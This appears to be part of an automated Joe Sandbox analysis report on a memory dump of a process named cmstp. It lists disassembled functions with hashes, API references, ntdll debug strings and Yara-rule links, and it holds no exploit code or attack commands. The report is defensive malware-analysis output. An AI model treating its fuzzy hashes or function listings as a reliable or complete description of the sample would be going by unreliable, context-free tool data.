                                          • Opcode ID: d59582f19b360dc28271a67351cc61e4cbe4d03cec5b6d7a8251e671ccc347fa
                                          • Instruction ID: 9fe3956f10f1ee3b0781d3b98773ebc11abbe51a0541033b791e7510553b655d
                                          • Opcode Fuzzy Hash: d59582f19b360dc28271a67351cc61e4cbe4d03cec5b6d7a8251e671ccc347fa
                                          • Instruction Fuzzy Hash: E761D372D00A49EBCB25DF5EC9408BE7BF9FF54210B14C52AF8AD87145E236EA41CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EF7EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                          Download Yara Rule
                                          APIs
                                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01F13F12
                                          Strings
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01F1E345
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01F13EC4
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01F1E2FB
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01F13F75
                                          • Execute=1, xrefs: 01F13F5E
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01F13F4A
                                          • ExecuteOptions, xrefs: 01F13F04
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: BaseDataModuleQuery
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 3901378454-484625025
                                          • Opcode ID: f688e9acb393f81aac045ee9a080af5e188bfab7a16106c505028d149dcd6945
                                          • Instruction ID: 8cf29383c0016d5f6cf89aaaeb7ed0af7e7e1a9562aba9427ceedf9b849bbbe6
                                          • Opcode Fuzzy Hash: f688e9acb393f81aac045ee9a080af5e188bfab7a16106c505028d149dcd6945
                                          • Instruction Fuzzy Hash: CB41D972A4030D7ADB219B94DCC5FDF73BCAF58700F0404ADBB05E6085E7719A868BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01F00B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: __fassign
                                          • String ID: .$:$:
                                          • API String ID: 3965848254-2308638275
                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction ID: 4c98f179a8272ff31137eafa3be1d57833a8c16a37f499a982a1463abc4aae5d
                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction Fuzzy Hash: 32A18071D0070ADADF26CF58C8457BEBBB5AF05384F24846AF942A72C1DE325681EB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01F00554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                          Download Yara Rule
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01F22206
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-4236105082
                                          • Opcode ID: 776ca66a4ffd9ca4ee43b6e64642fd2901141f32e3affef4b93b9b966d21a4ba
                                          • Instruction ID: 1e1038bc1d5cadf5e91f5572137b1553332d9f9746f829c436d81a66c14d043e
                                          • Opcode Fuzzy Hash: 776ca66a4ffd9ca4ee43b6e64642fd2901141f32e3affef4b93b9b966d21a4ba
                                          • Instruction Fuzzy Hash: B8512B35B00222ABEB15CA1DDC81FA673A9AFD5720F21421DFD55DB2C9DA33EC428790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01F014C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___swprintf_l.LIBCMT ref: 01F2EA22
                                            • Part of subcall function 01F013CB: ___swprintf_l.LIBCMT ref: 01F0146B
                                            • Part of subcall function 01F013CB: ___swprintf_l.LIBCMT ref: 01F01490
                                          • ___swprintf_l.LIBCMT ref: 01F0156D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: d4ce5fec15419ee9109ddea44788489f6df361f841beb52175bcbe6ca0a70ea6
                                          • Instruction ID: b8fec63dcaf66e06fb6b1f3d5f0b701fc8d4b2e3cd77cc0235f6c93a22616211
                                          • Opcode Fuzzy Hash: d4ce5fec15419ee9109ddea44788489f6df361f841beb52175bcbe6ca0a70ea6
                                          • Instruction Fuzzy Hash: AA21F772D0021ADBDB22DF58CC00AFF77ACAB90704F484019ED46E7181DB72DA598BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01F63DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: 0e180bf99ae1f1ea62f349228976c716f30f7fd3adae7ef5494b2ceb2292b728
                                          • Instruction ID: 2a178118609cbcde2d28f658fa35f2e69218c1b5c31b2af6754994bd7e90bfc5
                                          • Opcode Fuzzy Hash: 0e180bf99ae1f1ea62f349228976c716f30f7fd3adae7ef5494b2ceb2292b728
                                          • Instruction Fuzzy Hash: 5221C8B2D0022AABDB10AF69CD449EF7BACEF24B54F040525FD0993141E7769A49C7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EE53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                          Download Yara Rule
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01F222F4
                                          Strings
                                          • RTL: Resource at %p, xrefs: 01F2230B
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01F222FC
                                          • RTL: Re-Waiting, xrefs: 01F22328
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-871070163
                                          • Opcode ID: 9030b1ca91d7373caab703923876553ddef5f38aff011300c8700d2809773c6b
                                          • Instruction ID: 2676c316be32f98c6a33fa45c197857e5991e8ff538bb23489f86f5229c9cf54
                                          • Opcode Fuzzy Hash: 9030b1ca91d7373caab703923876553ddef5f38aff011300c8700d2809773c6b
                                          • Instruction Fuzzy Hash: A4513A75600712ABEB15DF28CC80FAB73E8EF55324F104219FD05DB285EA72EC428790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EEEC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                          Download Yara Rule
                                          Strings
                                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01F2248D
                                          • RTL: Re-Waiting, xrefs: 01F224FA
                                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01F224BD
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                          • API String ID: 0-3177188983
                                          • Opcode ID: 9ccea7f5bb449148fd527f32cfe7821e1ee5d9b4c3fe9322d0f83ca74a6c0d5a
                                          • Instruction ID: be166d89fa138dcffe0919f3c4a71c7ff1e1083183e4923bd268fc9e0e40773d
                                          • Opcode Fuzzy Hash: 9ccea7f5bb449148fd527f32cfe7821e1ee5d9b4c3fe9322d0f83ca74a6c0d5a
                                          • Instruction Fuzzy Hash: 70411870A00215EBDB24DF68CD88FAE7BF8EF88720F108609F6559B2C1D736E9418761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EFFCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: __fassign
                                          • String ID:
                                          • API String ID: 3965848254-0
                                          • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction ID: cfdd61a4e5432f48a130749a65dea49f68c977a7f8904643c89f0ed03c1b110c
                                          • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction Fuzzy Hash: 3191A232D00256EADF24CF98C8457EEBBB4FF85714F24906EDA11A7292E7315A41CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01F75CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: $$0
                                          • API String ID: 1302938615-389342756
                                          • Opcode ID: b79ed6d8a28a8b32456fff1413df9c2559110664ca5c55e3a7439fdc3e957b7e
                                          • Instruction ID: 65402b69525bb7ba15db55015201cbe2bab2a0e86a5fe85e93732de368117ea1
                                          • Opcode Fuzzy Hash: b79ed6d8a28a8b32456fff1413df9c2559110664ca5c55e3a7439fdc3e957b7e
                                          • Instruction Fuzzy Hash: DF91A070D0828ADEDF25CFADC8543EDBFB1AF01310F148A5BD8A1A72A1C7764A42CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%